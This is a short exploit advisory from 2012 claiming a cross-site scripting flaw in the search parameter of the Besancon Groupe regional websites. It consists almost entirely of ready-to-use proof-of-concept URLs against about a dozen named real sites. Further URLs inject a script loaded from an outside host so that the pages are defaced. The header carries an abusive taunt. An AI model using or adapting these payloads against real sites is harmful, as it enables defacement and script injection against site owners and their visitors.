Besancon Groupe suffers from a cross site scripting vulnerability.
5f8f23f32d01106f603b86e783a9575b9d850a24fcc9d38853eba80fce0ab5cd
+-------------------------------------------------------------------------------------------------------------+
# Exploit Title : Besancon Groupe - All website XSS (Cross Site Scripting) and deface
# Author : Atmon3r
# Date : 14/02/2012
# Editor : https://www.webconfiance.com
# Perso : Fuck your Tramway !
+-------------------------------------------------------------------------------------------------------------+
[+] Exploits
https://www.website.com/index.php?rech-site=[XSS]
[+] Poc
https://www.besac.com/index.php?rech-site="><script>alert('Xss By
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.fczoom.fr/index.php?rech-site="><script>alert('Xss By
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.besancon-zoom.fr/index.php?rech-site="><script>alert('Xss By
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.montbeliard-zoom.fr/index.php?rech-site="><script>alert('Xss
By Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.pontarlier-zoom.fr/index.php?rech-site="><script>alert('Xss
By Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.lons-zoom.fr/index.php?rech-site="><script>alert('Xss By
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.dole-zoom.fr/index.php?rech-site="><script>alert('Xss By
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.champagnole-zoom.fr/index.php?rech-site="><script>alert('Xss
By Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.vesoul-zoom.fr/index.php?rech-site="><script>alert('Xss By
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.gray-zoom.fr/index.php?rech-site="><script>alert('Xss By
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.luxeuil-zoom.fr/index.php?rech-site="><script>alert('Xss By
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
https://www.belfort-zoom.fr/index.php?rech-site="><script>alert('Xss By
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
[+] Other
All page can be xssed defaced
Exemples:
https://www.besac.com/index.php?rech-site=/"><script
type="text/javascript"
src="https://vuln.xssed.net/thirdparty/scripts/ckers.org.js"></script>&submit.x=14&submit.y=9&act=rechercher
https://www.fczoom.fr/index.php?rech-site=/"><script
type="text/javascript"
src="https://vuln.xssed.net/thirdparty/scripts/ckers.org.js"></script>&submit.x=14&submit.y=9&act=rechercher
https://www.besancon-zoom.fr/index.php?rech-site=/"><script
type="text/javascript"
src="https://vuln.xssed.net/thirdparty/scripts/ckers.org.js"></script>&submit.x=14&submit.y=9&act=rechercher
# The End //